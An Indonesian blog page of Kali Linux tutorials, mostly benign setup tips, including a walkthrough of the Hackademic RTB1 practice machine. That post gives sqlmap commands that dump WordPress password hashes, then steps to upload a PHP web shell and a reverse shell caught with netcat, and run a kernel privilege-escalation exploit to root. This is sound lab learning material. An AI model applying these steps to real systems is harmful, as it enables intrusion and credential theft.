Search

Showing posts with label Kali Linux. Show all posts
Showing posts with label Kali Linux. Show all posts

1 Decrypt MD5 menggunakan findmyhash KALI LINUX

Monday, 20 October 2014
  
Open New Terminal
>python /usr/bin/findmyhash MD5 -h fecbe946f015cb6b0863b3ad488aa0dd


TerimaKasih Semoga Bermanfaat.



Read more

0 Install Firefox di Kali Linux

Tuesday, 14 October 2014
 
># apt-get remove iceweasel
># echo -e "\ndeb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main" | tee -a /etc/apt/sources.list > /dev/null
># apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29
># apt-get update
># apt-get install firefox-mozilla-build
Read more

0 Scan Admin Login menggunakan Disbuster

Wednesday, 27 August 2014
> Open new terminal #dirbuster
>Masukkan URL+Port target

>Pilih Select Scanning type
 # List based brute forse ( Menggunakan Wordlist )
 # Pure Brute forse ( Langsung exsekusi )

>Jika ingin menggunakan Wordlist. pilih file system

>Pilih browse usr/share/dirbuster/wordlists/directory-lish-2.3-medium.txt | Start
 
>Jika kalian beruntung,maka ditampilkan lokasi login adminny




 Sekian Terima Kasih. Semoga bermanfaat



Read more

0 Penyelesaian Hackademic_RTB1

Monday, 25 August 2014
>Pertama install Servernya di v-box ato v-mware jg bisa

>jika selesai open new terminal kita scan ip nya. dengan perintah
#netdiscover -i wlan0 -r 192.168.1.0/24 (wlan0nya bisa di ganti dengan eth0.karena ane pake di jaringan wirelles jadi gunakan wlan0)

>setelah discan kita temukan bahwa ipnya adalah 192.168.1.104 . copy ip tersebut ke URL browser kalian.

>klik tulisan Hackademic.RTB1 kemudian klik lagi tulisan Uncategorized (yg ada dibawahnya). liat alamat URLnya berubah menjadi http://192.168.1.104/Hackademic_RTB1/?cat=1 

>selanjutnya copy url tersebuat buka terminal kalian jalankan sqlmap. dengan perintah
#sqlmap -u http://192.168.1.104/Hackademic_RTB1/?cat=1 --dbs
(hasilnya)
available databases [3]:
[*] information_schema
[*] mysql
[*] wordpress

#sqlmap -u http://192.168.1.104/Hackademic_RTB1/?cat=1 -D wordpress --tables
(hasilnya)
Database: wordpress
[9 tables]
+-------------------+
| wp_categories     |
| wp_comments       |
| wp_linkcategories |
| wp_links          |
| wp_options        |
| wp_post2cat       |
| wp_postmeta       |
| wp_posts          |
| wp_users          |
+-------------------+

#sqlmap -u http://192.168.1.104/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users --columns
(hasilnya)
Database: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(60)         |
| user_aim            | varchar(50)         |
| user_browser        | varchar(200)        |
| user_description    | longtext            |
| user_domain         | varchar(200)        |
| user_email          | varchar(100)        |
| user_firstname      | varchar(50)         |
| user_icq            | int(10) unsigned    |
| user_idmode         | varchar(20)         |
| user_ip             | varchar(15)         |
| user_lastname       | varchar(50)         |
| user_level          | int(2) unsigned     |
| user_login          | varchar(60)         |
| user_msn            | varchar(100)        |
| user_nicename       | varchar(50)         |
| user_nickname       | varchar(50)         |
| user_pass           | varchar(64)         |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
| user_yim            | varchar(50)         |
+---------------------+---------------------+

# sqlmap -u http://192.168.1.104/Hackademic_RTB1/?cat=1 -D wordpress -T wp_users -C user_login,user_pass --dump
(hasilnya)
Database: wordpress
Table: wp_users
[6 entries]
+---------------------------------------------+--------------+
| user_pass                                   | user_login   |
+---------------------------------------------+--------------+
| 21232f297a57a5a743894a0e4a801fc3 (admin)    | NickJames    |
| 50484c19f1afdaf3841a0d821ed393d2 (kernel)   | MaxBucky     |
| 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3)   | GeorgeMiller |
| 8601f6e1028a8e8a966f6c33fcd9aec4 (maxwell)  | JasonKonnors |
| a6e514f9486b83cb53d8d932f9a04292 (napoleon) | TonyBlack    |
| b986448f0bb9e5e124ca91d3d650f52c            | JohnSmith    |
+---------------------------------------------+--------------+

========================================================================

buka browser

login ke http://192.168.1.104/Hackademic_RTB1/wp-admin

login menggunakan super user GeorgeMiller | q1w2e3

login dshborad > klik OPTION > klik Miscellaneous > klik conteng ALLOW UPLOAD > pada kolom Miscellaneous tambah extension php

klik UPDATE OPTION

======================================================

klik TAB UPLOAD untuk mengupload backdoor

download backdoor


1. upload shell.php 
catat URL nya <a href='/Hackademic_RTB1/wp-content/shell.php' title=''></a>
buka browser http://99.99.99.7/Hackademic_RTB1/wp-content/shell.php
tampilkan shell

2. upload bekonek.php ke folder /var/www/html/hekdemik/wp-conten/
kemudian edit file bekonek.php ganti dengan IP kali-linux

3. jalankan di terminal nc -lvvp 443

4. jalankan bekonek.php dari browser

http://99.99.99.7/Hackademic_RTB1/wp-content/bekonek.php

5. jalan di terminal whoami

id (enter)

uname -a (enter)

6. upload exploit.c ke wp-content

dari terminal masuk ke /var/www/html/Hackademic_RTB1/wp-content

jalankan perintah sh-4.0$ gcc exploit.c -o sploit

akan muncul file spoit


7. jalan perintah

sh-4.0$ ./sploit
./sploit
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc0aa19ac
 [+] Resolved default_security_ops to 0xc0955c6c
 [+] Resolved cap_ptrace_traceme to 0xc055d9d7
 [+] Resolved commit_creds to 0xc044e5f1
 [+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
whoami
root
id
uid=0(root) gid=0(root)

============================
Selesai. Semoga Bermanfaat
=======================================================



Read more

1 Cara Cepat Membuka Terminal di Kali Linux

Sunday, 24 August 2014
CTRL+ALT+T

jika tidak bisa, coba buka System Settings dipojok kanan atas dekstop kalian.kemudian pilih keyboard > Custom Shortcuts > klik lambang (+).

isikan
Name : Terminal
Command :  gnome-terminal
Apply

ketika selesai. klik Disabled disebelah tulisan terminal,hingga muncul tulisan New Accelerator,
kemudian ketik di keyboard kalian perintah CTRL+ALT+T,

Sekian Terima Kasih,Semoga Bermanfaat
Read more

0 Mengembalikan Grub Kali Linux


> #fdish -l
> #mount -t ext4 /dev/sda* /mnt
> #mount -t proc proc /mnt/proc
> #mount -t sysfs sys /mnt/dev/
> #chroot /mnt/bin/bash
> #grub-install /dev/sda
> #mount -o bind /dev/mnt/dev/

Sekian Terima Kasih.Semoga Bermanfaat
Read more

0 Recovery Foto di Flashdish Mengunakan Magicrescue Kali Linux

Wednesday, 11 June 2014
Dalam merecovery ini ada beberapa exsistensi yang bisa di ambil oleh  Magicrescue,antara lain
  • avi
  • elf
  • gimp-xcf
  • gzip
  • jpeg-jfif
  • mp3-id3v2
  • perl
  • zip
  • canon-cr2
  • flac
  • gpl
  • jpeg-exif
  • mp3-id3v1
  • msoffice
  • png
Pertama buka distro Kali linux kalian,kemudian pilih

Kali linux -> Forensic -> Forensic Carving Tool -> Magicrescue

Setelah terbuka langkah awal yakni colokkan flashdish yang ingin kalian recovery.

1.Open new Terminal ketik perintah # fdish -l
 Ket : perintah diatas ialah untuk mengetahui Devise Boot pada flashdish yang kita colokan tadi.

2.Kita buat sebuah folder baru di root untuk menampung seluruh file yang nanti kita ambil dari flashdish.
 Ket : Folder baru nya saya beri nama Magicrescue

3.Setelah selesai maka Open New Terminal lagi ketik # magicrescue -r jpeg-jfif -r jpeg-exif -d /root/Magicrescue/ /dev/sdb1

4.Ketikan perintah sudah dienter maka seluruh file berextensi jpeg yang sudah lama hilang  akan kembali lagi.



5.untuk melihat hasil fotonya,bisa dilihat di forder yang tadi diberi nama  Magicrescue

SELESAI
Semoga menjadi tambahan ilmu baru buat kita semua
TERIMA KASIH





Read more

0 Install Turbo C++ di Kali Linux Menggunakan DosBox

Monday, 9 June 2014


langkah awal untuk menginstall C++ di distro Kali Linux,kalian terlebih dahulu telah menginstall sebuah program yang bernama DosBox.
bagi yang belum mempunyai Aplikasi C++ nya bisa di download Disini


cara install DosBox nya cukup mudah.
1.Open New Terminal ketik #apt-get install dosbox


2.setelah terinstall jalankan DosBox dengan mengetikan perintal dosbox di terminal kalian.
3.jika installan kalian berhasil akan terlihat dosboxnya akan terbuka seperti gambar di bawah.


 4.Selanjutnya Jalankan perintah

     Z:\>mount C /media/3CBEAAE8BEAA99C2/TC/BIN

ket : diasumsikan perintah /media/3CBEAAE8BEAA99C2/ merupakan Local Dish C saya di Kali Linux, dan perintah /TC/BIN merupakan Sebuah Folder yang tlah kalian download tadi dan BIN folder yang berisi aplikasi untuk di jalankan nanti.

5.Langkah selanjutnya Masukan Perintah C:
kemudian kita  masuk ke directory C untuk Memanggil TC kita tadi.

 6.panggil folder turbo C++,dengan Perintah TC

Semoga bermanfaat.TerimaKasih

Read more

0 sources.list Kali Linux

Sunday, 8 June 2014
gedit /etc/apt/sources.list

## Security updates
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb http://http.kali.org/ /kali main contrib non-free
deb http://http.kali.org/ /wheezy main contrib non-free
deb http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali-dev main/debian-installer
deb-src http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali main contrib non-free
deb http://http.kali.org/kali kali main/debian-installer
deb-src http://http.kali.org/kali kali main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
deb http://repo.kali.org/kali kali-bleeding-edge main
Read more

0 Error update kali linux 'non-fre/binary-i386/packages'

Friday, 7 February 2014
 
kali ini masalah saya di kali linux terdapat pada ketika updatenya..
ketika saya mau update ternyata keluar pemberitahuan  

W : failed to fetch http://security.kali.org/kali-security/dists/kali/updates/InRelease Unable to find expected entry 'non-fre/binary-i386/packages' in Release file (wrong sources.list entry or malformed file)


mungkin yang sedang membaca ini,mempunyai masalah yang sama dengan saya,ooke langsung saja..

coba ente cek
home folder - file system - etc - apt - sources.lish klik kanan (open menggunakan with Gvim)

kemudian cari ## Security updates
deb http://security.kali.org/kali-security kali/updates main contrib non-free

nahh ketika sudah ketemu pastikan bahwa kata yang diatas sama persis dengan punya kalian.

jadi apa penyebab,terjadinya error di atas tadi...?
ternyata setelah diteliti,masalahnya terdapat pada kata non-free.
punya saya tadi kurang huruf e-nya..

 yaahh udah tinggal saya kasih kata e
,untuk melengkapi non-free tersebut. hehehe :v

coba kalian update ulang mudah-mudahan berhasil.. :D








Read more
Back to top